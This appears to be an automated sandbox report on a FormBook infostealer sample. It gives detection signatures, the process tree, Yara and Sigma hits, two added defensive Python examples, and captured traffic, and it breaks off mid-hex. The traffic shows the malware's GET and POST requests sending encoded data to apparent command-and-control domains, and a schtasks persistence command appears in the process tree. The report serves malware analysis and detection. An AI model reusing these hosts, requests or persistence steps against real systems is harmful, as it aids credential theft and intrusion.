Analysis Report pZTgBSxb0oe9deC.exe

Overview

General Information

Sample Name: pZTgBSxb0oe9deC.exe
Analysis ID: 286339
MD5: ae816597f9990952c8b6f523b64f24c9
SHA1: f6a8209eebb95669f4c1223d4abe02888bf54173
SHA256: 98605f399585016ae41edcfbc496fa98225ad51928b26b9dff6261fbc09d7d7f
Tags: formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • pZTgBSxb0oe9deC.exe (PID: 5860 cmdline: 'C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe' MD5: AE816597F9990952C8B6F523B64F24C9)
    • schtasks.exe (PID: 4636 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • pZTgBSxb0oe9deC.exe (PID: 1548 cmdline: {path} MD5: AE816597F9990952C8B6F523B64F24C9)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5952 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c27a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c27a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(8 further memory-dump entries not shown in this extract)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c27a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b47a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown in this extract)
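The Yara tables above list each matched string with its offset, and two details are worth reading off them before trusting the verdict: $sequence_0 contains the RDTSC opcode (0F 31), which is the instruction behind the "RDTSC time measurements" signature, and the three JPCERT/CC strings are each a five-byte `push imm32`, so the rule is keyed on constants the author associates with sqlite3 calls rather than on API names. Note also that every string sits exactly 0xE00 lower in the `.unpack` view than in `.raw.unpack` and in the memory dump, the shift you expect between raw-file and section-mapped offsets. The following is an added example, not Joe Sandbox, yara-signator or JPCERT/CC code: it re-derives the match list by scanning a buffer for the same byte strings, decodes the push immediates and flags the RDTSC. The buffer is constructed (NOP filler with the strings planted at the offsets the first memory-dump entry reports), and the rules' conditions are not on the page, so only the string search is reproduced.

```python
"""Re-derive the Yara string hits listed in the Yara Overview above.

Added example, not Joe Sandbox, yara-signator or JPCERT/CC code. The hex
strings are copied from the rule matches on this page; the buffer they are
searched in is constructed here (0x90 filler with those strings planted at
the offsets the report printed), not the sample's memory.
"""
import re
import struct

# name -> hex bytes, exactly as the report prints them
FORMBOOK_STRINGS = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",  # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",     # mov [edx+eax],cx / pop ebx / mov esp,ebp / pop ebp
    "$sqlite3step": "68 34 1C 7B E1",              # push 0xE17B1C34
    "$sqlite3text": "68 38 2A 90 C5",              # push 0xC5902A38
    "$sqlite3blob": "68 53 D8 7F 8C",              # push 0x8C7FD853
}

# (string, offset) pairs copied from the 00000005.00000002.244372940...sdmp entry
REPORTED_OFFSETS = [
    ("$sequence_0", 0x98D8), ("$sequence_0", 0x9B42),
    ("$sequence_7", 0xB253),
    ("$sqlite3step", 0x18349), ("$sqlite3step", 0x1845C),
    ("$sqlite3text", 0x18378), ("$sqlite3text", 0x1849D),
    ("$sqlite3blob", 0x1838B), ("$sqlite3blob", 0x184B3),
]


def hex_to_bytes(hexstr):
    return bytes.fromhex(hexstr.replace(" ", ""))


def find_strings(buf, strings=FORMBOOK_STRINGS):
    """Scan buf for every string; return {name: [offsets]} in ascending order, like the report."""
    hits = {}
    for name, hexstr in strings.items():
        pattern = re.escape(hex_to_bytes(hexstr))
        offsets = [m.start() for m in re.finditer(pattern, buf)]
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(hexstr):
    """If the string is a single `push imm32` (opcode 0x68), return its little-endian operand."""
    raw = hex_to_bytes(hexstr)
    if len(raw) == 5 and raw[0] == 0x68:
        return struct.unpack("<I", raw[1:])[0]
    return None


def contains_rdtsc(hexstr):
    """True if the RDTSC opcode bytes (0F 31) occur in the string."""
    return b"\x0f\x31" in hex_to_bytes(hexstr)


def build_constructed_buffer(planted=REPORTED_OFFSETS, size=0x20000):
    """Constructed stand-in for the memory dump: NOP filler plus the planted strings."""
    buf = bytearray(b"\x90" * size)
    for name, offset in planted:
        pattern = hex_to_bytes(FORMBOOK_STRINGS[name])
        buf[offset:offset + len(pattern)] = pattern
    return bytes(buf)


def summarize(hits):
    """Annotate each hit the way an analyst triaging the report would."""
    lines = []
    for name, offsets in hits.items():
        hexstr = FORMBOOK_STRINGS[name]
        note = ""
        imm = push_imm32(hexstr)
        if imm is not None:
            note = f"push 0x{imm:08X} (constant the rule names after a sqlite3 API)"
        elif contains_rdtsc(hexstr):
            note = "RDTSC read (matches the 'RDTSC time measurements' signature)"
        for offset in offsets:
            lines.append(f"0x{offset:x}:{name}: {hexstr}" + (f"  ; {note}" if note else ""))
    return lines


if __name__ == "__main__":
    for line in summarize(find_strings(build_constructed_buffer())):
        print(line)
```

Point the same scan at a real dump (a `.raw.unpack` file or a process memory region) and the offsets it prints should line up with the table above; if they are all shifted by one constant, you are looking at the other of the raw/mapped views.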

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started
Author: Joe Security
Data:
  Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'
  CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: 'C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe'
  ParentImage: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe
  ParentProcessId: 5860
  ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'
  ProcessId: 4636
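Two things in this Sigma event deserve a practitioner's attention. The command line names System32\schtasks.exe while Image and NewProcessName say SysWOW64: that is file-system redirection, because the 32-bit sample launched it, and any rule that matches on the image path must allow both. And the persistence artifact is a task XML written to the user's Temp directory, which is the condition the rule keys on. The following is an added example, not Joe Sandbox's or the Sigma project's code: it rebuilds the Startup tree from the page and runs a reconstruction of the rule's logic over it. The events are constructed from the tree above (PIDs, images and command lines copied from it); the sample's own parent PID, explorer.exe's image path and the benign control event are invented, and the Sigma rule body itself is not on the page, so the matching is this example's own.

```python
"""Replay the Sigma hit above over constructed process-creation events.

Added example, not Joe Sandbox's or the Sigma project's code. Events are
constructed from this page's Startup tree; field names follow the Sigma
process_creation convention, but nothing here reads a real event log.
"""
import re
from collections import defaultdict

EVENTS = [
    {"ProcessId": 5860, "ParentProcessId": 4242,          # parent PID invented
     "Image": r"C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe",
     "CommandLine": r"'C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe'"},
    # Image is SysWOW64 although the command line says System32: WoW64
    # file-system redirection for the 32-bit parent (both paths are on the page).
    {"ProcessId": 4636, "ParentProcessId": 5860,
     "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' "
                    r"/XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'"},
    {"ProcessId": 4708, "ParentProcessId": 4636,
     "Image": r"C:\Windows\system32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 1548, "ParentProcessId": 5860,          # second instance of the sample
     "Image": r"C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe",
     "CommandLine": "{path}"},
    {"ProcessId": 3384, "ParentProcessId": 1548,          # image path assumed
     "Image": r"C:\Windows\explorer.exe", "CommandLine": ""},
    {"ProcessId": 5952, "ParentProcessId": 3384,
     "Image": r"C:\Windows\SysWOW64\help.exe",
     "CommandLine": r"C:\Windows\SysWOW64\help.exe"},
    # invented control: a task registered from a non-temp XML must not fire
    {"ProcessId": 6100, "ParentProcessId": 4242,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks.exe /Create /TN 'Backup\Nightly' /XML 'C:\ProgramData\Backup\nightly.xml'"},
]

TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "%temp%")
XML_ARG = re.compile(r"/xml\s+['\"]?([^'\"\s]+)", re.IGNORECASE)
TN_ARG = re.compile(r"/tn\s+['\"]?([^'\"\s]+)", re.IGNORECASE)


def scheduled_task_from_temp(ev):
    """Reconstructed rule logic: schtasks.exe /Create whose /XML file lives in a temp directory."""
    if not ev["Image"].lower().endswith("\\schtasks.exe"):   # System32 or SysWOW64 both pass
        return None
    cmd = ev["CommandLine"]
    if "/create" not in cmd.lower():
        return None
    m = XML_ARG.search(cmd)
    if not m:
        return None
    xml_path = m.group(1)
    if not any(marker in xml_path.lower() for marker in TEMP_MARKERS):
        return None
    tn = TN_ARG.search(cmd)
    return {"task": tn.group(1) if tn else None, "xml": xml_path}


def detect(events):
    """Run the rule over every event; return hits with PID and parent PID attached."""
    hits = []
    for ev in events:
        detail = scheduled_task_from_temp(ev)
        if detail:
            hits.append({"rule": "Scheduled temp file as task from temp location",
                         "pid": ev["ProcessId"], "ppid": ev["ParentProcessId"], **detail})
    return hits


def render_tree(events):
    """Rebuild the Startup tree from parent/child PIDs, marking events that fired the rule."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    children = defaultdict(list)
    for ev in events:
        children[ev["ParentProcessId"]].append(ev["ProcessId"])
    rule_for = {h["pid"]: h["rule"] for h in detect(events)}
    lines = []

    def walk(pid, depth):
        ev = by_pid[pid]
        name = ev["Image"].rsplit("\\", 1)[-1]
        mark = f"  <-- {rule_for[pid]}" if pid in rule_for else ""
        lines.append(f"{'  ' * depth}{name} (PID {pid}) cmdline: {ev['CommandLine']}{mark}")
        for child in children[pid]:
            walk(child, depth + 1)

    for pid, ev in by_pid.items():
        if ev["ParentProcessId"] not in by_pid:      # roots: parent not in the capture
            walk(pid, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS)))
```

The explorer.exe node is rendered as a child of the second sample instance only because that is how the report draws its injection target; a real process-creation log would show explorer.exe with its usual parent, so the injection step needs a different telemetry source (the thread-injection and APC signatures above) rather than this tree.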

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: pZTgBSxb0oe9deC.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exe | Avira: detection malicious, Label: TR/Kryptik.hjvbc
Multi AV Scanner detection for domain / URL
Source: http://www.glowtey.com | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exe | Virustotal: Detection: 34%
Source: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exe | ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: pZTgBSxb0oe9deC.exe | Virustotal: Detection: 34%
Source: pZTgBSxb0oe9deC.exe | ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: pZTgBSxb0oe9deC.exe | Joe Sandbox ML: detected
Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49746
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49752
Source: global traffic | HTTP traffic detected:
  GET /k8b/?abg0n=0v5M9lAxeGs3Z2wSqhBRyQiK1iT/MtB56uN4ob1ruqxgc5JDlvFtl3BValt9kiEa9zMj&mVJl9j=h2Jdsdr8W25Tg0Np HTTP/1.1
  Host: www.messi-and-ronaldo.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /k8b/?mVJl9j=h2Jdsdr8W25Tg0Np&abg0n=6dMkGDfpk1r0Gmr8hQYTBKv4S6+5Z6uHlrQcjV8Ea1YOfXcWOZvOwazRs+Dk1aCo4f0j HTTP/1.1
  Host: www.westhillsterracepdx.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /k8b/?mVJl9j=h2Jdsdr8W25Tg0Np&abg0n=2gApIl2Au4n1uRFWrzVZLEXy//w6Ybr6Vv4mKuths8NfzmG+Z+iGg3adnddbL4twR+EY HTTP/1.1
  Host: www.7sat.asia
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: RMI-FITECHFR
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.messi-and-ronaldo.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.messi-and-ronaldo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.messi-and-ronaldo.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 38 4e 31 32 6a 41 63 51 54 47 41 43 41 6e 39 53 77 47 63 55 6c 6d 53 32 32 44 69 73 4a 50 5a 65 74 4a 63 71 35 5a 59 31 76 49 4e 4b 59 4b 6c 68 6c 50 41 45 67 53 45 34 5a 45 52 62 30 69 41 66 68 44 4d 79 30 79 69 53 31 68 57 64 69 42 5a 38 59 73 74 52 70 69 6d 42 66 4d 44 44 38 42 52 4d 77 4c 55 44 47 78 62 4a 31 5a 71 56 74 32 36 65 59 43 53 39 43 74 4e 76 37 4a 41 35 76 49 39 49 70 41 76 4d 73 31 34 63 6c 32 57 51 4d 67 32 67 62 44 58 53 64 76 71 66 48 64 54 72 58 50 6d 39 4e 4f 6b 76 74 65 58 31 72 73 76 2d 65 35 39 4f 61 55 44 47 63 52 5a 4e 6c 6b 4a 72 4d 30 38 64 6b 48 75 68 6e 2d 28 6b 30 66 6c 4d 66 2d 42 6a 6e 30 70 30 4f 56 6d 74 78 6f 30 76 75 45 64 75 7a 2d 74 70 69 4b 7e 74 75 42 54 72 31 37 31 4c 53 6e 52 66 62 6a 64 6f 65 32 4a 4f 58 32 34 52 68 66 4b 54 4f 61 78 78 47 55 6d 68 71 56 48 5f 54 65 75 53 50 63 75 70 67 30 6a 65 52 2d 35 38 28 68 42 41 6a 73 37 74 31 5f 69 4b 4e 4c 28 5a 31 78 47 6f 6a 41 61 68 54 58 39 74 74 70 54 55 47 31 4a 30 42 36 35 74 67 31 53 6b 30 4b 35 6a 37 5f 4e 38 70 6a 5a 34 71 31 6d 44 63 2d 6f 6d 67 4b 66 66 64 65 42 51 70 75 42 50 56 6f 72 6a 5a 58 74 35 28 32 37 42 61 4a 6c 6f 70 49 47 49 70 57 4d 34 4f 75 53 72 73 4a 46 30 56 44 53 30 70 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abg0n=8N12jAcQTGACAn9SwGcUlmS22DisJPZetJcq5ZY1vINKYKlhlPAEgSE4ZERb0iAfhDMy0yiS1hWdiBZ8YstRpimBfMDD8BRMwLUDGxbJ1ZqVt26eYCS9CtNv7JA5vI9IpAvMs14cl2WQMg2gbDXSdvqfHdTrXPm9NOkvteX1rsv-e59OaUDGcRZNlkJrM08dkHuhn-(k0flMf-Bjn0p0OVmtxo0vuEduz-tpiK~tuBTr171LSnRfbjdoe2JOX24RhfKTOaxxGUmhqVH_TeuSPcupg0jeR-58(hBAjs7t1_iKNL(Z1xGojAahTX9ttpTUG1J0B65tg1Sk0K5j7_N8pjZ4q1mDc-omgKffdeBQpuBPVorjZXt5(27BaJlopIGIpWM4OuSrsJF0VDS0pg).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.messi-and-ronaldo.comConnection: closeContent-Length: 185371Cache-Control: no-cacheOrigin: http://www.messi-and-ronaldo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.messi-and-ronaldo.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 38 4e 31 32 6a 46 6f 45 44 6d 56 5a 46 52 6c 54 28 32 4d 4d 79 32 6a 76 79 42 6e 71 4b 64 4a 6b 69 4f 73 45 35 59 70 79 69 71 31 55 54 4b 56 68 6e 4b 30 44 70 53 45 37 4e 30 52 59 6d 53 63 72 37 55 49 71 30 32 36 6f 31 68 75 63 37 53 42 35 59 38 74 34 70 43 69 39 4f 61 76 49 38 48 51 6d 33 70 34 62 44 78 58 4a 6f 5a 79 54 78 43 6d 46 66 47 4c 39 4c 35 74 6d 35 49 59 38 76 36 70 61 70 6d 6e 2d 37 41 5a 36 69 41 65 62 44 41 72 5f 66 53 66 6e 48 76 57 59 4c 36 44 30 4b 63 44 30 41 71 78 53 77 72 6a 71 31 4d 32 5f 4a 36 31 6f 4c 31 48 5f 51 67 4a 7a 6c 6e 59 51 53 6d 6f 4d 67 45 71 70 69 50 69 44 38 4e 4a 4b 62 4a 68 72 74 58 42 4a 49 56 57 53 70 70 45 4b 71 56 68 33 30 39 56 35 76 50 66 56 74 30 37 6e 36 71 45 69 52 30 64 74 5a 6a 73 4d 55 52 74 56 64 43 4d 4a 69 64 48 34 54 71 78 61 45 55 6d 6c 69 78 7a 48 42 35 66 65 59 74 28 4a 7e 6b 61 61 53 75 56 33 79 44 31 4d 6e 49 33 65 79 50 75 4f 48 62 76 68 69 45 57 5f 6b 33 54 65 57 58 38 7a 74 6f 28 4c 47 31 49 50 42 37 35 4c 68 48 75 6b 6c 4c 59 76 37 63 6c 77 72 6a 5a 66 6f 6c 57 42 48 38 4d 32 67 4b 48 66 63 76 78 36 72 64 52 50 52 37 7a 38 5a 31 46 35 34 47 37 42 51 5a 6b 39 71 49 4c 44 74 55 56 34 46 76 66 52 34 70 4e 6e 5a 67 33 4d 37 63 4c 4c 52 41 65 5f 6a 53 45 6f 4c 5f 38 30 6e 68 35 32 4e 41 65 4d 6c 78 51 6c 7a 44 42 55 61 65 72 4e 66 4e 4f 39 53 68 71 34 74 56 79 41 75 6e 56 4c 6e 68 28 33 54 2d 6d 70 63 38 51 58 56 63 41 6a 67 52 6b 74 64 6b 65 78 32 33 6c 6a 7e 4e 61 30 42 31 66 52 42 56 55 5a 68 59 50 4f 56 52 4b 69 35 49 6c 54 7a 6d 78 
4d 54 55 34 6f 63 56 45 44 47 57 73 49 4f 7a 7a 6b 38 78 67 68 41 62 61 48 74 6a 4e 69 49 68 50 69 64 63 36 6c 6f 78 62 4e 61 55 61 57 66 6c 33 53 77 37 48 78 77 34 62 33 41 43 4d 4d 34 4e 5a 6a 41 35 68 4f 73 4f 70 70 68 67 45 38 54 6a 54 79 48 47 4c 30 64 4a 28 73 32 69 56 2d 4f 71 57 56 6a 4f 45 55 4f 48 49 32 45 39 75 6d 78 6f 6c 76 48 4f 37 72 76 55 51 31 28 31 64 41 75 4d 65 6e 37 6d 4b 52 50 30 38 56 31 31 47 53 43 50 37 67 69 6a 59 41 63 42 54 79 67 68 37 77 31 6b 68 51 70 4b 43 70 46 7a 43 31 28 62 48 6e 56 69 33 52 74 48 72 45 4d 65 6c 39 77 42 28 6e 7e 71 6c 49 36 74 62 35 59 61 51 36 6a 52 56 35 33 64 73 43 66 47 79 6e 59 32 79 30 6f 56 4b 37 31 4e 66 48 4b 46 30 52 56 2d 55 72 7e 73 6c 69 28 35 74 46 33 31 6f 52 4c 31 4b 54 6f 53 59 62 63 6a 62 72 6a 48 32 59 4e 48 28 76 73 75 51 75 62 58 43 53 32 61 70 55 68 71 58 5a 56 64 31 31 47 71 33 38 4a 74 45 75 66 76 61 68 45 31 63 72 51 5f 31 4b 4a 30 78 4f 78 54 46 75 38 2d 32 6c 32 39 64 66 33 55 41 61 77 6c 56 34 50 41 7a 43 58 6c 79 54 55 72 77 72 41 70 65 4
